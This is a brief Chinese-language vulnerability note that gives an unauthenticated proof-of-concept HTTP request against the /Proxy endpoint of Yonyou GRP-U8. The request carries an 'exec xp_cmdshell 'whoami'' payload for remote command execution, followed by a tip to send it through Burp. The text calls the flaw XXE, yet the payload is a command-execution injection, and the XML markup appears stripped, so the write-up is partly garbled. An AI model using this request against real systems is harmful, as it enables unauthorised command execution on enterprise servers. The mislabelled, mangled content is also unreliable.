一、漏洞介绍

    用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。

    二、漏**洞条**件

    无需条件登录

    三、POC
    **
    POST /Proxy HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
    Host: localhost
    Content-Length: 341
    Connection: Keep-Alive
    Cache-Control: no-cache

    cVer=9.8.0&dp=<?xml version=”1.0” encoding=”GB2312”?>XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell ‘whoami’

    条件:POST协议下提交到目录/Proxy 直接提交XXE到BP包发包。